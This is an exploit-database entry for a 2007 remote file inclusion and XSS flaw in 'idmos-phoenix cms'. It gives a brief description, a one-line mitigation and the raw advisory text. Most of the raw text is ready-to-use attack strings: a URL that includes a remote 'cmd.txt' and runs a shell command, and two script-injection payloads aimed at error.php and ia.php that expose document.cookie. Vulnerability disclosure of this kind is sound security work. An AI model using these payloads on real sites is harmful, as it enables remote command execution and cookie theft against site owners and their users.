header-logo
Suggest Exploit
vendor:
CMS
by:
HACKERS PAL
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: CMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

idmos-phoenix cms Remote File inclusion

This vulnerability allows an attacker to include remote files on the server. In this case, an attacker can include the 'cmd.txt' file from the localhost and execute the 'dir' command.

Mitigation:

The vulnerability can be mitigated by properly sanitizing user input and using secure coding practices to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

idmos-phoenix cms Remote File inclusion
 
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
 
RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir
 
Xss
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>
# WwW.SoQoR.NeT

# milw0rm.com [2007-10-07]